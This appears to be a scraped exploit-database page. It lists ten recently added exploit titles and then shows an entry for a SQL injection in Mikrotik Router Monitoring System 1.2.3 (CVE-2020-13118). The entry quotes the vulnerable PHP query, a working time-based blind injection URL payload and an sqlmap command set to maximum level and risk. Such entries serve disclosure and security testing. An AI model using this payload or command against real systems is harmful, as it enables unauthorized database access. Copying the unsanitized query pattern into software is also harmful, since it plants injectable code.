
10 changes to exploits/shellcodes HP LinuxKI 6.01 - Remote Command Injection Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection Online Examination System 1.0 - 'eid' SQL Injection Oracle Hospitality RES 3700 5.7 - Remote Code Execution forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload online Chatting System 1.0 - 'id' SQL Injection Online Healthcare Patient Record Management System 1.0 - Authentication Bypass Online Healthcare management system 1.0 - Authentication Bypass
22 lines
No EOL
753 B
Text
22 lines
No EOL
753 B
Text
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
|
|
# Exploit Author: jul10l1r4 (Julio Lira)
|
|
# Google Dork: N/A
|
|
# Date: 2020-05-16
|
|
# Vendor Homepage: https://mikrotik.com
|
|
# Software Link: https://mikrotik.com/download
|
|
# Version: <= 1.2.3
|
|
# Tested on: Debian 10 buster
|
|
# CVE: 2020-13118
|
|
Description: SQL Injection found in check_community.php:49
|
|
|
|
$community = $_GET['community'];
|
|
$_SESSION['community'] = $community;
|
|
$query = "SELECT name from router where `community`='
|
|
$community'";
|
|
|
|
PoC:
|
|
|
|
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
|
|
|
|
SQLmap using:
|
|
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3 |